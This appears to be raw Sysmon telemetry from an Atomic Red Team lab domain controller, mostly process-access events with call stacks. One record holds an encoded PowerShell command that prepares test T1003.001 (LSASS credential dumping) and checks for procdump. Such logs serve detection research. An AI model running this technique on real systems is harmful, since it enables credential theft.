10341000x80000000000000004307Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004306Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004305Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004304Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004303Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004302Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CD0-5FA1-D700-000000008801}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004301Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.214{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD0-5FA1-D700-000000008801}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004300Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.217{D28789B6-7CD0-5FA1-D700-000000008801}3412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004299Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.074{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD0-5FA1-D600-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004298Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.074{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD0-5FA1-D600-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004297Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.027{D28789B6-7CD0-5FA1-D600-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_il0tuw1a.phs.ps12020-11-03 15:52:48.027 10341000x80000000000000004296Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:48.027{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CD0-5FA1-D600-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004295Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD0-5FA1-D600-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004294Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD0-5FA1-D600-000000008801}1568C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004293Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004292Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004291Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004290Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004289Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004288Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004287Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004286Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004285Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:47.995{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004284Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 